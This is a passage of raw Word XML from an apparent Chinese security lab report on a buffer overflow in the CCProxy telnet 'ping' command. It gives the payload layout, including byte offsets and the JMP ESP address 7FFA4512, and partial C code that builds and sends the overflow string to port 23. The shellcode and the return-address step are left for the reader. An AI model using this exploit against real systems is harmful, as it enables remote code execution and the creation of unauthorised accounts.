          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5029200" cy="366712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29200" cy="3667125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最终，在控制台下输入net user可以看到成功添加了一个a用户</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5762625" cy="657225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5"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62625" cy="657225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hellcode被正确的执行了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>程序编写思路</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="240" w:firstLineChars="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本机与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CCPROXY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的连接是</w:t>
      </w:r>
      <w:r>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接，首先需要编写程序以</w:t>
      </w:r>
      <w:r>
        <w:t>TELNET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的形式登陆到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CCPROXY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上，即建立</w:t>
      </w:r>
      <w:r>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接，去连接</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CCPROXY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>号端口，一旦连接建立好了后，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>便可以发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报文，报文的内容是</w:t>
      </w:r>
      <w:r>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">\r\n </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，主机名便填写上文提到的超长的字符串进行溢出。注入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shellcode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">7FFA4512 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JMP ESP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。字符串的前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节为无用的字节，从第五个字节开始便可以用来写</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ShellCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，构造的</w:t>
      </w:r>
      <w:r>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机名应当如下：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节的无用指令</w:t>
      </w:r>
      <w:r>
        <w:t>+ShellCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（最多可以从第</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节到</w:t>
      </w:r>
      <w:r>
        <w:t>1012</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节）</w:t>
      </w:r>
      <w:r>
        <w:t>+jmp esp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（第</w:t>
      </w:r>
      <w:r>
        <w:t>1013</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节到第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个）</w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后的填充字节。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLine="360" w:firstLineChars="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此按照上述思路编写出客户端与服务器端通信的程序如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="200" w:lineRule="exact"/>
        <w:ind w:left="839" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>#define MAX_LEN 2000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>char shell[] ="XXXX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>请</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>自行构造";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="200" w:lineRule="exact"/>
        <w:ind w:left="839" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>int main(int argc, char* argv[])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">WSADATA ws; // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">初始化 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>int ret = WSAStartup(MAKEWORD(2, 2), &amp;ws);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>struct sockaddr_in sa;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sa.sin_family = AF_INET;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sa.sin_port = htons(23);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sa.sin_addr.s_addr = inet_addr("127.0.0.1");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>char buf[MAX_LEN];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>char buf1[1024];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>buf[0]='p';buf[1]='i';buf[2]='n';buf[3]='g';buf[4]=' ';</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>插入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>int l = strlen(shell);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>个字节为无用字节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>buf[5]=buf[6]=buf[7]=buf[8]=’a’;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>开始填入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>该处</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>代码自己研究;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>到溢出点为止都填入无用字节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for(int i=9+l;i&lt;1012+5;i++)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>buf[i]=’a’;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">在溢出点处填入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">jump esp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>指令的地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">               </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="200" w:lineRule="exact"/>
        <w:ind w:left="839" w:firstLine="450" w:firstLineChars="250"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>该处</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>代码自己研究</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>继续填充无用字节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for(i=1021;i&lt;1998;i++)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>buf[i]='a';</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>命令结束加上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>buf[1998]='\r';buf[1999]='\n';</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">创建 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SOCKET sc = WSASocket(AF_INET, SOCK_STREAM,IPPROTO_TCP, NULL, 0, 0);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="200" w:lineRule="exact"/>
        <w:ind w:left="840" w:leftChars="350" w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>连接到服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ret = connect(sc, (const sockaddr*)&amp;sa, sizeof(sa));</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>接收服务器端的回答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>recv(sc,buf1,1024,0);</w:t>
      </w:r>
      <w:r>
